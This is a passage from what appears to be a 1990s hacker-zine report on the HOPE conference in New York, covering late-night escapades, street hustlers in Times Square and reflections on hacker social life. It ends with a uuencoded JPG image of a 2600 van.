Communist Cap, Fusion cursed at passers by in Korean and almost started
an incident, Lucifer 666 relayed in vivid detail his ex-girlfriend's
Fallon-esque ability (much to the shock and envy of everyone listening),
Count0 told his decapitated dog story, and there was much rejoicing. (YAY!)
As the night went on, Ice-9 and I decided now was the time to actually
check out the seedy underbelly of Times Square. At 1:00 in the evening.
Alone. Drunk. Wide-eyed out-of-towners staggering up side streets in
one of New York City's sleaziest areas.
Within a few minutes of hitting 42nd and 7th, we were approached by a
street hustler. "Yo, what you need? Crack? Smoke? H? You like young
girls? What you need, mah man?" Ice-9, in his drunken glory, "Yo man,
you don't know who the fuck you're dealing with! I'm the biggest fucking
felon in the whole goddamn world. You don't have shit that I couldn't
get, and probably don't already have." The hustler took a double-take
and said, "Yo, I likes your style." Ice replied, "You damn Skippy!"
Shortly thereafter, another hustler showed up. "Yo man, you want crack?
I got the rock right here." Ice looked at him and said, "Man, if I smoke
any more crack tonight, I'm going to fucking explode." The dealer went
away fast.
Times Square isn't quite as sleazy as it's made out to be actually.
I've been in worse. It does, however, have the most extensive and
cheapest collection of European smut this side of Copenhagen. In fact,
the same movies from Holland would have cost 40 American dollars more in
Holland than they did in New York. Beyond that, Times Square had little
to offer anyone. That is, unless you wanted to spend a buck in a
really sleazy peep show to grope some crack whore. I think not.
Somehow, we made it back to the Blarney Rock alive, only to find that they
had kicked everyone out. We headed back to our cell and passed out.
The next morning, I came to early and wandered around the hotel. The second
floor had caught on fire recently, and one wing was completely
barbecued. All the gutted rooms were unlocked and the phones worked.
God only knows why people weren't using these rooms as squatter's pads,
considering how broke most hackers are.
The main ballroom in the hotel was very cool. It was easy to see how
at one point in time the Pennsylvania was quite a sight to behold.
I suppose it was much like New York itself in that respect: Once
a marvel of the modern world, now a festering sore crying out for
a good cleaning and some antibiotic.
We left New York at noon that day, and did not even get the chance to
see the numerous panels scheduled for that day. With my complete absence
from any panel it's doubtful I would have made it anyway.
-----------------------------------------------------------------------------
So, did I like HOPE? Yes. I like cons for what they should be:
a chance to hang out in person with your idiot online friends. Hackers
are an odd bunch. We are all basically a bunch of self-involved,
egomaniacal, borderline-criminal attention-seekers. Rarely, if ever,
can we expect to meet anyone stupid enough to share our interests.
Normal citizens, with whom most of us share absolutely no common frame
of reference, look at us as if we were Martians. Even those
computer-literate folk who talk geekspeak and understand most of
what we are saying are left in the dark when we begin babbling
about breaking into anything.
Collectively, we are all fools, and without the opportunities of
any social interaction with our peers, we will all fall prey to fear,
uncertainty and doubt regarding each other. We had the social aspect
many years ago in the early 80's with the proliferation of BBSes and
teleconferences. Now, much of that interaction is lost. Compared to
our subculture's "Golden Age," the teleconferences and BBSes that exist
today are a pale reflection of the ones of yesterday. All we have is
the inane banter provided by IRC and the occasional con.
Our only hope is each other.
See you all at Summercon 1995 - Atlanta, Georgia.
-----------------------------------------------------------------------------
begin 644 2600VAN.JPG
M_]C_X``02D9)1@`!``$`:@!J``#__@`752U,96%D(%-Y<W1E;7,L($EN8RX`X
M_]L`A``%`P,$`P,%!`0$!04%!@<,"`<'!P</"PL)#!(0$Q,2$!$1%!<=&!05S
M&Q81$1DB&1L>'R`A(!,8)"8C("8=("`?`04%!0<&!P\("`\?%1$5'Q\?'Q\?4
M'Q\?'Q\?'Q\?'Q\?'Q\?'Q\?'Q\?'Q\?'Q\?'Q\?'Q\?'Q\?'Q\?'Q\?'Q__`
MQ`&B```!!0$!`0$!`0```````````0(#!`4&!P@)"@L!``,!`0$!`0$!`0$`_
M```````!`@,$!08'"`D*"Q```@$#`P($`P4%!`0```%]`0(#``01!1(A,4$&D
M$U%A!R)Q%#*!D:$((T*QP152T?`D,V)R@@D*%A<8&1HE)B<H*2HT-38W.#DZM
M0T1%1D=(24I35%565UA96F-D969G:&EJ<W1U=G=X>7J#A(6&AXB)BI*3E)66)
MEYB9FJ*CI*6FIZBIJK*SM+6VM[BYNL+#Q,7&Q\C)RM+3U-76U]C9VN'BX^3E\
MYN?HZ>KQ\O/T]?;W^/GZ$0`"`0($!`,$!P4$!``!`G<``0(#$00%(3$&$D%1D
M!V%Q$R(R@0@40I&AL<$)(S-2\!5B<M$*%B0TX27Q%Q@9&B8G*"DJ-38W.#DZF
M0T1%1D=(24I35%565UA96F-D969G:&EJ<W1U=G=X>7J"@X2%AH>(B8J2DY255
MEI>8F9JBHZ2EIJ>HJ:JRL[2UMK>XN;K"P\3%QL?(R<K2T]35UM?8V=KBX^3E&
MYN?HZ>KR\_3U]O?X^?K_P``1"`#>`4`#`2$``A$!`Q$!_]H`#`,!``(1`Q$`?
M/P#Y*(QFJDO!'/:JB.1'T//%`X]J;$A>E)TI#%#LO0D5/;SN)5RW`-)H:9H'$
M)\@G/(//_P!:K,9(&*R9JC9\&8/BS3<CI.#^A-9WBB82>)=3<,1FX8C'UJ%\H
M?R&4%=@P"L#]:<)&`^9`0/0U0#A+&>&4CZBHIDB9ALQP"?TH6@,L0<SL?IU-E
M3N@VG.?J*3!;&6T$9Y:$Y_O*<4KJCHJHXCV],@C_`#^57<5B.6VE8KL&\J<_V
M*<G\NM10*ZWJB1&0^A&*I-$6L=1IN51_7?\`T%7U8%2#U%8,U1F>)@$TY-IXA
M,@_D:Y5AB0?[PK:GL9SW/0=`^6UCSZ#^9K45,MTP?;BN>6YHMBYJ@$?C?P<A2
M8C]S$,#OF0]?SK;_`&NF23QS:[PQQ:@#:<8Z'^M8K^+#YE?89YRR$>&XE'(R8
MX`QS]UZ]"_9%B"_$BX+1"$C3I>3GGYD]:VJ_PY"CI)'!>+Y3)\1[XGRBAO\`%
MD$KG&ZFZC#&]O&S96*.`O(5.#@,G&>V3@?C54]HBENSM_P!GJWU[4-=>[TC4^
M8+5+=Q]I5XBX,6#\J\CGMSGKGMSYM<R"7Q.C%B`9X^@^E$7'VLDET&TU!&GJ8
MA!TW;_TR_JM;OP/A#^+851&)62)L;O1Q[>].7\-A'XT4/CG<@_$O5B4#?OB..
M<]CCM]*R+)\Z5)@``Q]NWR"M:/\`#B3+XF<T8P,U2=<XY[5<6920S8/6D"$4'
MVQ)!M/I2;3Z4!8`"*<G#"@2-C:!Y&<9V9]ZLKP`*Q9LBUI4E^FJVPTL;;LMB-
M%LCA^W7C_P#75)K1M9\02QSMY9)=Y2.N5&6Q^1J59.X/834=,MX6MY[.>X-GU
M.C,A=<OE>&&.!54P7*,H1D96Y&[@@<]1VZ5HG=:D*XX&[0`M#DG(P""P_`<CY
MI3(KA9G*[2"%(YZT670?,7(QB9@6Q@U)(=L9P1Q6;-$1J`J+F.09';!I=L3'O
MEE!]&&/YU/,5RBMI\;#(X'J#D5%-$\4L8,A*`YQZ5497):L:^FKF.3H,/Z8[?
M"K@CV]P#4O<$9WB)Q+;1VXRKAMY8CY<<\?6N=^QS&6/:F[+#[O/Z=JU@[(B2R
M=ST#2X3;V$.Y<?+SQ]:N),%YQTK![E[%W4&#?$3P8H[K:@CZR5L?M0WL2?$$5
M+(2H6!0`"?[J^E8+^)!>I?V&>>ZBP&@(5'!DDQ],/7H/['Z[_']\PXQILO\`K
MZ''6]32E(F/Q(\N\53%O'5S+ZW8/ZBK7B,D:8A!Y`"D>H//]!6L=%$E]3U#]F
ME63R9-5\S*LWEX'3/$G^%>..'&O)(0=JSJ<GV(K*G_'G\BY?PXFMJYWV+(O7J
MR>YP/O)72_L_PB/QDH=T'^K(^;C_`%T8[?6M)_PF*/QHQOC(/-^(>KLSHN+J3
M4`<]G8?TJA9IC2V'!&T#]*UI?PXDM>^S`GNFO9'G=$1GY(08&:H,.1]*J.ADR
MQI7%`7%#!`%I0N*0Q0O/2@+\V`!2`UF0@0@'@)V'&>._<U91.G(K-EHZ#P'8_
MBX\66*MT5F?CU"DC]17+ZE-)9:_-<1*C%)W.UQD'GD$>E1'XVO();%?5M8GU7
M-HOW,5O'#GRXX5VJI)R2*IQW,\$F^.:2-_[P8@_G71%)*QFR==8N0I5RLH.=+
MP;/)/?@CGW[]ZKV>?M"@<9-%DEH"-=D9)WV@\'IC'Z4RX&%;VK(U,^*[N]["1
M)BVT],#UJ9=8F0_O858$=.G%-TXO;<49RB2KJ=JQ!,+1GU7C^5,:X$MT@BE8E
MKUYJ8TY1>I3FFM#=TQSY+KT)<YR,5>.0.<]*EC0HA61<,*KRZ)#.PP@'T%).G
MP%O2;&6RDP9I&3&`K,2!^%:#(4&<?E2;U%8OW'[SXD^%0$SL6S_#YQ5K]IYUU
M?XD2XV$K$@Y(X.Q:QA_%CZ,T_P"7;..U%-NAQ;=N0S'YB,=&]>*]+_9(&WQ7E
MJ$WRAA8RCY`,?>B]*TJNU*1,?C1Y)K69?$D\@EPI?.,'T^E6==A+::H7`)9>O
MWU[UO%Z(A]3U']F2)X5UE]J82W1SN.#QY@XKQJ\\D:O)AY-PD/&SCCWS65+^,
M/.WD7/\`AQ-767$=GAAD>5C@_P"TO^%=K^S780ZCXUVL'4+"7'S#JKQD=O:K3
MJ:4F$?C1R7Q5?S/'6JG:"1=S=3_TU:JUKQ8@=/G`Q^-:T_X:)?Q,YL<`U59@L
M&P3VJT8L3<OJ/SI1CUH8(<(SC(Z4H3TJ2ARKBG1QYE7ZT@-5TR8<$G]T.V!V?
MZ?XUJ6&LV6CZ<WGV<5Y,\N`C=0N.N<<5G)7T*V-SX>S1W/BF.>.#R4,<I$9;G
M=M^0\9KB=6CW:C<'_IJW\ZF&DV-[%18<YH\G.*U)&/`!_"*6SC!NH]JD$,.A&
MIW%8VX(M\TI&`=W&/H._?ZT3V[>4_`/%97LS0P?LUW:LVQ77GM0+R=8_+D16_
M`&T;TSM^E:6A,E.<-!ZW=NP`EM`2!C(;';%+`(/MMOY!898;@W8Y]J%&4>N@G
M.49=+,Z>TC)$O&,NW05/Y&T_>)]<UDRD12226Y+9&`,\MC\OUJ:.XECC64EE'
M4M@[E!Q['O\`I2&7H;HN`2BY_P!DG^M6!*KX&-OU%2T"-6&W#_%_PU%T(^Q8_
M'_`EJ#]J1@OQ4O$#<*D?_HM*SI_Q8^C+?\-G*ZN?^*<4>@S^O_UZ]._8_:-=Z
M6UB209"VCXY]3'_A55OX$B8?&CQ^[?S-9E/NW\JN>)>-&5EX(E4?HU="6Q#Z[
MGJW[,I>'PQXGN#LVK9<EASD>8>/\^E>(W49;7KC@X$KG^=94OX\_D7/^'$UM&
M>#-:*%!)P!Q^'^%=_P#LTV^L+KE\VC26<-^MJ_E?;48QMRG!QSSCJ*TJ-*D[T
MBBO?1P/CV;4)_%E^UPT*SF=S+Y3?)N+$G&><9I8SLB0$@_O1W_VJUA;D5A:\.
MS.=(P*H3</\`A51,9$>*!QT--DH<K..`Q_.G++(O1OTI6&/6XD7N#^%2PW+EI
MQ\BDBILBDS>6/<\6>#Y/&>O4=NU$UJ!AL=*R-$=9\+X]WB%@?X+:0]/;_P"O"
M7'WY4WL^2%)D8\_6IA\;"6A454#'YE/XU(L!/TK1Z$H9+`0I]J73;9FNAE>A`
M';/<4^@&U`GEW,I?.%E&[)R<8&>E3ZQK5MJK3+;:8ELB9"2J<&0>ZUBU=W*U@
M,8M<?W,\]B/ZT+*1]^$GU^6ER]C3F$9+5C\\*C/M_P#6JLL,4.IP&%<`.IX.B
M>_M50YD[$SM8ZG3F(MCP.7;I_O&GJZAR<#D"D]Q$-W`LTHZK@=0I(^E119";E
M4;"QGUZ4(9>L8'1!NZGMG.*NQHQP@'-2P-;0KZWU#XV:-Y9YB>VC`8X.Y"N0=
M/RJI^TC,+CXJZBP:(?+%]XJ/^6:^M94]*L?0M_`SC[_5K233#`DT9D$?3'^TS
M/PZ5Z9^RWJMI:7VN+/=V\4KVRI$A8*79CP%'<\=JNO!^PD3"2YT>0M<1R:S+A
MMG0+N;&6VCTZGBM/6IXY;!5AO+9<2!N+A?0]@?>NFVQDY(](^!6OV4/A#Q+9"
MOJ,(NY[61(HF?#2L(W;@'D\9KQ]]1A_M22<RDH7;MZY_QK*E!JK/3L:3DN2)R
M8U+7+:^BVH)%((Z@>]>B_LZ^+]'\.>(I&U*\-L'*HFZ)FWEN,<`XYQR:TJTY=
M.DTA0FE.YP7C:YC?Q7JFXMN6Y=6P.,@D54.N1F,1B(X&#G/XUO3B^5$2DE)EN
M-ONGZ529=STHD2&B,;@#5FWLXIG"G<.O0TIMH<4+-I\<>[:S?+C&:K&`AL9IE
M1E<&K`(B*GL8B;I5]Z;8D>G>./`T'A"#PW-#<RS-JFB1WT@=0-C,W(![CBN;1
MFC^2N=.Z3-MF=/\`"],:S=-_=LI#C\JXF^M))+N5UB<H7;D#(ZFBGI-DRV,Z<
M:VV-T(IHAQT)%=!F(?-7@2.!]:LZ2TQOD_>':",\]LTFM!HZ"VB9I9A@#Y^F\
MW'8=JBO8/*1P`,`>E8]31,QTUE0/FA<?0YJ:+5[4_>#+CU6FZ;0*:+"W]G*HR
M^8#USQ4.R&;4HS$0P&.@H2:!M&[9Q%;5<#J3_,T/&4/XU`T-^U`3%-V"O7_/U
MX4\.I<%@II6&6871!\JJOL.*MV\I#;AU%2P)&\*KXQ^+UGHZEHC<A4W(0#N$`
M1(_4"L;XM>$]0T?Q0FG7H_TJUL[>"0`AN4B50,@XZ`5-&IRN,?(J<;ILXZ/1&
M9'4'=C/M7IWP0^&=UXC34[VT/^E:5<V=RK;PH\L-(7_55/X5O6JVILSA#WCAP
M;/P#KOB/4IHM(TRZNW+,V(HR0%#8))Z`#(R3P*[73OV>-:O]/CBN_$/A'3)%4
M)#+<ZQ$Q4YZ?N]U5*O&*#V3.W\(?L]Z=H^F@S^/_``@=32Y,@D@OW9#$8]NT>
M_*.<DGZ&L=?V2;J4-&GC'PT\C.&6Y6_'D*A[$$;RV<=!CFL?K-G?]#6-*+5F!
M.;]CKQ(DPMH-<T"\>3:4N8=0401CG.\,-Y/3[JGK6YH'[*7BC0`]A>1Z7J4EG
MY<0-!=V5R6%ML8[MVY1P0PZ?W>AJGBDU9!&C%-7?X'H&N_LPB;Q=#=P>%K*\\
MT^7Y[N1Y%!+D2$G'7@^6,]^3QSFAI_P#@LK>1]5\`:>BQ3)]R-G9D\T[CQ_L^
M8Q6?OI:-FEXOHCY)?A&'M5:)07&1W_I7:CB8OE+YB\'J:L6T>R0')&,U,F.*1
M))!O=UW9R!VIKV;>:!D?=J$[%,B:`PGGO4E@G^G?0?TJB=CVWXSIG1OA^Z@;=
M3X7A&0>,A^:\[:'>F.E8QV1H]V=/\,;?&IZB2,[=/D/_`(\M>W?`KPAX?U_X*
M&FYUZ":>WM]6N'D6*9(R$S$6)+,H``3DYSM+`<FL9ZM_(J)I^._V4]#U;PR_<
MB+P5?71,MN)[:SN,,L@8JP"L<$9'3.><9-?-TVBO&Q6:R7/.=\`'\Q5JY$H]&
MC%U3280<>2B'/\*XJAI%EY=[(0#A6&/S%=$7H9VL;EE`?-DXP-YZ9QT'KS3=%
M1MSY3\=O6I*.<@\/SRS+$K#+,!RM6;[PE>Z=,T4AC8J<9!/^%/VJO8.70M^&C
M_`6N>*-3BTS2=.DO;N4_)%%U./Y#WK9;X::SX9\0W6DZQI\EM>6A`E0X8+D9H
M'(.",=\T.:V#E>Y?BT*2"$?(3R?YFJMQ8-&<D=*R;U*1P^L0R)J$H+9PW&:K>
M+/<1D;)7&.F&-;JUB>IL>'KFZGO`LK%T1>YZ?XUUEI'O=5QR2*QJ:,N)U7P^B
MA/\`PT)I7'"2_P`HC5;]H*U-U\2=4N5!.R11Q[`"N.+M./H;_99Y5+I\D+*FY
MQU.!D$5]#_LB6+G3O%ZEECW6\$89C@#/G<G\ZZ:[3I,S@K2//_''C*71DD\+>
M>'+ZYFTI5(M85&1/(6R\SC&,D]!GY5_,]OX/T*UO'=KKRW=55>HQQUQZ\YK..
M,7&-WU*JRB[6^9Z#I7AJPC`^6*,#LH&35K4[&"&+RDAV@]^<FJ1!S-WX9BN)6
M-R1@GWKL_AUX$EN+@75R\PMHC\L>XX=O\!6].*D]3.4FMCT2'3$L[4VD!DAA,
M/.V*1D'Z&O._B)\03\,==L(I-<UCR+H;?)699`')X),G10-Q//:KJPA%72'1V
ME.I)1/AIQ\K?2H[>VGD8-%"[@-C(&>U7>R,WN*;6X60?Z-*.3_":GMXY!.5,$
M$@Y/:IDUW*2L/(V2N2K#@=13_-!D7Y&^[4#&-"T\N$5B?3%7],\,:Q<7I,&EW
M7TO!^Y;NW;V%.Z6X<K>Q[QX5\/7GCSP?9>$/%6AZ[IDVF!CI.KKI<LJ*CL"\B
M,B@9QG!![8[8YV+#]D#6M1A,MIXATXH#MS+#)&?R(S7/SV=D:\FEV0:K\`]7D
M^$>FWNLZAJNFW:2P-;JEOYFX,?FSRH&,*>]6_P!G[X467CGX?>=J?B76H+*6]
M\D#:=;2!(25(^8YR">G\/:I<K78))GTE!IZ6^D:?I4"3_9+&".!/+E`F=4"[1
M?GX_NC/KS42Q"S79%H>LNH];Z-O_`$-ZA^:*7D5I=*T_490M[X-U"13U:5;"X
M0#\W)J#5?@KX=O\`]YIMAX=M78@L+O0H)O\`T`H?U-$8I;:!*3]?O_4XC6O@^
M+X@MVEDL_"GP]U.(L2!%!-:R$?3<5!_&N$U[P!?Z86BU#X"-<O\`WK&_N"I_G
M%"P%:6:ZD73V,"X\(Z=','D^#/BBRQWAOICC_ON$U8U+P]X$D>W_`+5T'QC8E
MRRC*YDBY('3YD&:A[Z,.FJ-WX91>$?!/BJS\0:(OBYGC5@T+VL3B1".5.UL^.
MA^H%>UZ+XJ_X2[Q"C6NDZM9V=P#'=PWVBXCFP#@F4],>^1VP*:=]PV,SX@?`U
M?2/$\HO=&M$TZ3!61(81Y3GU`'0_05X[XZ_9[UW0[87$5HUTC';^Y1B0?<8IK
MNZU)L>-:_P#"S6+66XFO-(OK9=XVO+;LJD<=R*YFY\%7$3M]TJHSTK2-6PFBE
MSI'AZ2RU*>+:?D5.,=R,FNHTW36:[A4@@%U'3WI2E?4I:'2>$K*>T^-MG?>6`
MWE+=2+OQQ\L8R/PWC\ZYG]H"^D/Q!U/;*RPF7D`G&<GMT[5STK.I'T-).T3'@
M\)^`O%/C>UGU/2]*O[^(3;#+%&[C<`,C(/7D5Z!;MJ_P7^%NMC44FMM7\12B[
MUMK>52K10QJ?,E(/(SO(_"MZG*_<(BVM3Y]DNIW9I$(5`V,@"A-:U&V(,=W(^
MI'3%=O*CGYF;VD?$_7K%U5]3OD4<;HKEUQ^&<5ZMX#\7:[XF_=?VW<2PK$SLL
MQ?<?1>3G')&?;-93II:EQF:=YXW\2^%UCEN+^QD60GRP\*;FQZ!5!..*]]^%Y
M&I^)-=\(6-Y<M#"\\7FHABP`O.WC(/(P?QJJ='=ILB5:/8W9[C7X\D_9)!VVA
MQ$$?^/FOF7]I[6[RPU*.VU6R=I[O]]!<QN%$:+\NS:RL&^\3P1U%;.C=;DTZ8
MRC+W=&>`>;`?XS_WS39)A'M,$KJ0W."161HR+^T+N.0;;F48/]\U.OB+4T+@2
M7TQ"]`7)'44I4XO=`I-&SH[7]Q);76K:@]AI]QD^?Y/F.ZJ<$HF1NYR,D@9!P
M&<BO:_!GQ'^"'A&*-Y?#NOZY=JOS7&H+%@_2,-M`^H)]ZYYP5[)&T6TCT;2/)
MVMOA?IN$L?"EY:CT@MH5_DPK>M?VP_AY)@/8:O#]88^/_'ZCEY=D%V^IMV'[9
M57PRN1AM0N;?VDM\_P#H)-=%IGQY^&^I\0>([92/^>L;Q_JR@4W)):H7*^AQ3
MW[1'B[P]KWP]VZ/J]A>NL^YD@G5V4;'Y(!R!G%:'['5M&/@=IKX'[RZN6/\`F
MW]8?TI*SD/5(]F$*Y'MTH\@`5IRF?,)L4'''Y4P6T*$E40$\G"CFIY4--H06X
ML(D\P`@_[+$#\A3)+682.\-]*I/1'"NBG\@?UHM;8=^YROC.^UV/3YK)XTM#-
M(R"/4[8EPOS`D.A&Y,C(R"V,U/X7\2^'?'5M,VE3>>+8A';R60H6SC!8`]!U*
M%9.SERR-$K1NC5715CMS%#>7B>C>>78?]]9K,F\%7$SECXEUDY.=I:$#Z<1BY
MJY+:$\QTMLWV>!(54[44*,MDX%8'CGP[/XHTMX+6[FM;A1F)UD*@-[XYQ5RUZ
M5B4K,\QM_AM\4M#D=[/Q#!/DDJKS%QCC`PZ?6J^I>$_%]XTG]N?#WP[JZ%?F'
MDB6..5O^!!L_I67)J.[1B2?"[PU=:C*]]X%\2:([%0TMLYGAZ=<L"<#VINJ_>
M!;0K/3O[2TKQ''</`5D-HT/[W&X#L<\9]*):(:/(KOQ&-/\`B!#IZ1;6@U"YF
MF,Q;A@\*#;CMCRL]>]<7\2=<M9O&=\+N)YHYU^8QL`0<L1C((I48>\K=@F]+_
M&KIWQQE\*Z`-.\):OXFTZ8']W`_V22#)//`B!YK!^+/Q&O?'^KWVIWQ5?LUNY
MEM%&CDK'(YR^,]N)!^(K=4FIJ3,Y2]VQYL9B+=(QV)8T`!P!@$XYKLV,C:L_%
M#EG-X8N=3>259XFVH@88/([8^M;/@[Q/<>$-"N+JRF,=U<2>7"_'RA1@]?\`[
M>!_"LE)S33[E62.W_9^\$W7Q*\8RZE?R2M8V<BW%TQZRMG*)^.W)]E^E?9VC6
M*L5M(0`.,``=!76HJ,+(Y)RO.PKX"''3O7S/^V-I=["FEW^U9K"1S&NX?-;S^
M=\'^ZZCD>L8/KEA#XCYB`QW%."Y8=.M<YU$;C$N,CK4MI8FZEES((XD&Z1R//
MNC^I]!0W8:+-S=R3I&FYS%"FR(,V=BY)Q^9)^I-,497KV]:C8HN64-I'#(\[.
M3>=M!A5,;<Y&=Q^F<8'4_G;MG!V-+SDXV`^^*AW`E\502:)JSVBS9VQHS`'[\
MK%064^X;(_"LVWN)WY\QP>WS54+.*8GHSM?AS>W4BZS'-<2LBV1P&<D`[A7I0
M'[,FEZ_XE>6RTO6[K2H(%:225$!526PHR,')/;/0&L904I-%J;BKGN&K^,/B\
M1\*HX[G4-1T_7--\Q8_,;=OY.,LIY'X.WTKUK2_&%KJ?A.'7Y,6L#0&60,V1`
M'MSNY[@$'GO4N\-&/26J/.)/VA]*)N99/]$@B#!/.;,TC8&W;$.QSU+#&*SH]
MOVC=+N(%9M=M[28@;EETUV`/U68YK#G;V+LEN4-=^/'B:VT6XUC0;_PMJ]E:J
M2(ET-L\,L._.TE6/W21C(/6N9MOVI?'=X?W.CZ!*H/)620_UJKL+(NS?M">,%
M-8T^XLI]$M!'/$T;M%N#`$8."6.#CVK!\#?%'7?`DES'9V*R17#`M%(,!3VQ1
M@UDW+FN-6M9'<0_M"^(F4%M!BQ[,?\:M1_M`ZWCYM`C_`._A_P`*I3D*R%7]]
MHG5@VUM`AR/6X(_]EJ9?VA=4/3P[$WTN^?\`T&JYVA)(7_AHC4>G_",#/_7WN
MT_\`':5?VBKA0!)X8?CKBZ!_]EHYV.Q-'^T9$2-_AZZ7_=F4_P!*HZY\;-$U(
MZV:UG\/7R32?*DOR?*W8GGI1*>FJ"*L]#YV\3ZQHT^H1PR07D-VNLW#/=1*KO
MC8T("@*S`$AAD].">:\U\3^9>:I)&RQDJVWS3"8V/U`R/U-51C[R?D:2J>YR?
MM&_X&L;'2=,U37;RVB=M'L&>&13P;EV"Q9XZC+-_P"O-;EVDBR2Q:1]Q]#C_`
M`/6:ZZ=W)LYJC5DDB":,HP7'3M3@CH20M;&1<MKZ:"RFMW9MCX(7MD5=NE":6
M;:6APK;-Q/;YN?Z_I4VL]!GU-^R=;65GX$OEMI-TQOCYOS*<?NTQT_&O>=.'>
ME6A)QD]JZ6[Q./[;(YGV`9.,5X'^V%J5NG@S3;%B/.EOA(@_V51@3_X\OYT#$
MC\1\F@<U)$N9%Z=17,=A,ME]LN]J%%4<NYZ(O<FI)YDF(@ME9;5#D<89S_>;L
MW]NP_$F65L=5XY@\/Z9X8\-Z;IUNR:D(6GU*1QS(94C="#_=`.`.V#ZY/+6Z>
M@YRJG`J(WY=0ZEA".`%`XQTK:\"Z2FJ^+K:V,/FJ"9)$_O*@W,/J0"/QJ9/EP
MBV-;F5XRO7U'Q3J4[R>:3<.OF8QO`.`WXXS52T7&23C`Q6D5:*1)UWP[!%MKS
MDN"!]DQG_@0KZD_90T:TT[X2V%]#'BXOYI9)G[G;(R*/H`OZFIC\;_KH$](G+
M4_$!&O;*'2(U66YU&X2"!"<?-N!W?0=3]*S_`(_>++;X?^!K3PQ8.JI#;*9`"
M6QE%^5%/^\_)^E9XAWE8=%6B?'-SK<FH.UU=D3O)M9PQY[?=]!UXKZA^"W[+!
MG@GQ5\/],U_75U&2[OXO/VK/L5%)RN`!Z8Z^M+6.B-%:UR?XO?`3PW\-/ACX#
M@NO#T^H![I(_-$\JNH6-C)Q@`\D=237B/[/<,5[\0KNTGB5XI-,G?8PX+HNYP
M3CZ!JG^9!V/=K2&W31;Y].6*VFCM]ZND2DC;U(R"/X2.?6O,-5^)]D]UY=];T
M7C3!R@):)22/]U1GI7(GJ:V)(OCQ;0HJIYN`N5R\1XQU^[0O[0$,C;%#%CT&.
M^+_XGW'YU7)+L%T:N@_$5]<NV:6(QH5(7?M/(V],*/[U4_$WQ7O=*U1=-T:QK
MBO)TC\ZX>241QQ+VRW3/U_6E"'-*SV!NQK>&?BQ_;$,D-U;R6=]!CSK=V!(!G
MZ,K?Q*?6LJ;XVF.5XO[-D+H_ELHE'!RJ]<8/+`<4.G:5@OH;H\>0S0J^U"K`_
M$9]*J7'BN&Z80JL8+'`P!4,#QW4IH1JD-PS;D&NLKKGH""*9X[@M++4_/CGBC
MB210RK(V-V."`?;BNNGND9RT1IPVMH_POTV#6;P0PZO?3SB8O@.D`$<:[CZ-\
M)*?PKSN/1+BZBO+O3,BPM)`/WC*Q`=B$X[GCL*ZJ<D[JVM_^`8U(\J4KZ=NI2
M)<VVN6#SPS6FGLENGF3'[#;R%5)VY+[#W('7K5=I[>WAB%QHMA).PWDMYB?*2
M1\N0CC'K^57R]F9IHSDBBFF4?9E3+`;4<@8_X%G%77-P;B5A'&(R,8=0=H/Z1
MU5@O8^F?V2+^V;1=2TA67[0DXN3GC>K*%SC/^R,_[U?0BQ[8PJG:H%;<VB,)S
M*TF4[O,3;B5;%?+O[2VO_P#"47=MI%C(DL%BS/*RN"&D/``Y[#/YTTUL0M)'S
MSRO'M4]I;O/.D42L[L0`H')-<[T.TLW)6-&M8&RA(\Z0?\M&'8?[(_4\^F'VH
M=FTDB@?*O%0]"CK/BG9V\>NZ:+1I'$6C6"7#'[HF,"G`_P"`[?QS7+)"48\];
MJB/PH$A50EPHKTKX.:.MFFO>(YH0T-C:[5)."K8,FX?]^L'_`'JRK.T&AH\H4
MD0O*6.22:M+'MBV@8+''^?RKI).X\"6@@T#7)=IQ]G49[`\_X?H:^I/V8@J?%
M`_P\QZD7'_H^2LX?&_ZZ!/X3J/";PZQXRU3Q3=2*FFZ'&UI;.WW?-QF63/\`%
MLKQ_P(^E?/7Q/\;1>-]=U*2ZYBN"<*QY1!PB^Q"\_CFN:;;E<TM:-CP_QC:)C
MIS:;]F8XFL49@/524)_$IFOL;X._M#^$[#X4>'-/BNX)M2MK*.VFM?.5&1T`6
M4Y!^;!QG(!'-;3;Y4T@75&!\;_B%-XL^'6J2SW5O#`;NU@"6Y)P&68D$GU&/E
M;BO(_P!G6,6?Q=L;=N1-#<QYSU!MI<5A"3L[EM=CT[P-KWVW4+G3BW,UO+&H>
M^JG'ZYKR#QA'!_:_ER/$I2[\W$A^\O.1]?FK"G\1?0YV'3A'8O:^?`\32HS,D
MK$F,CL..<JOMCFE%NMFEM*ODO)$IBE)9N7PN#TY^[_2NKFN[$)6.PLKYH]!B=
MO+<_<NBF<8^\I_\`B*Y;6-36\U/4(YW=1<7MLDH5BI:/9C'TY-9TE:3_`*ZCB
MD.AU=M$U:!8IG/V>X$"[VRQ@D48&3U`<'%0R^)K>UOYXKC3XG4.54AV7^(\DO
MDGCE?Y]@*MQYM1)V+Z?$5Y51;>S79&GW%EY``XQQZ#\S^-;NAZP]_/92XV^8$
MRG`.0/QK&=/D6IHG<\SN[V5?%4J;CY;WX8C/<,0#^IKI?%UF^L:.FTYD@?<NY
M03QT(_45TOW919ENF>K_``VNM$\1_#'0?"WB33_#UW]C\XP0SW$EM/"S.S'<;
MZ,>O7E0#D=ZYI1\*Y(9HGTOQ7I2/PR6>IQS1GD'[K1J3R`>O85WQPKDWR.WJ9
M<DZRC;F5SG-9A\)ZGKYM],\5ZO'%=Q".[FU'3E^500P7]VS$\H.0!^62+MQ\Q
M%;36"UQ9_$OPG.S`<7-Q);/P,`?O(U'`&*F-&M:ZC?T'S4EI>Q3/[.7C(?OK7
M%;#58P>#8:A!<$Y]%5RWZ57U/X0>-])L0UQX2USS0WSL;"7:1R?O%<>E9\Z3#
ML]"G!M:'4_!37)OAUXB>_P!4Q80B$K*DYVEER,@`\Y`!;'.<8[BOJR#7H[BSL
MCN8)(IX9%#)(AW*P[$$5JFC"<7'<\\^-?Q/_`.$3\/!(XW\Z[8Q*4?:57'S$&
M?H/QKYPDUFQU>9A';/!@9RY&/SIZW,U%O4X'0M`U+Q%J,6G:387-]=S'$<$$C
M9=V^@%>BM\%O&G@.</J>D7VG70X>=[4R1(A&"%=0R'()SS[5SU)65COC%WN9U
M_B;P/=3ZY-/8V2_9[AO/ACAP0$;G"CK@'*_\!/I59/".K6@R;*='&`IE3:OX]
MDBL/:I*S*Y'T-)=`O=?T^>SN+BVBO$G22$,26F^4)MWXV@*JC[Q7\<\03?"?-
M6[25([V2&T,@RCROB-Q_LR`%&_!C4/$0AH4J3>ITEA^S]=F(-<ZJ(G(Z)"T@R
M_,&NTA\!W&A>!=0T'3IK26>YBV"27,94L1YGKG*A1[;1QR:\^>81FTK:'1]5Q
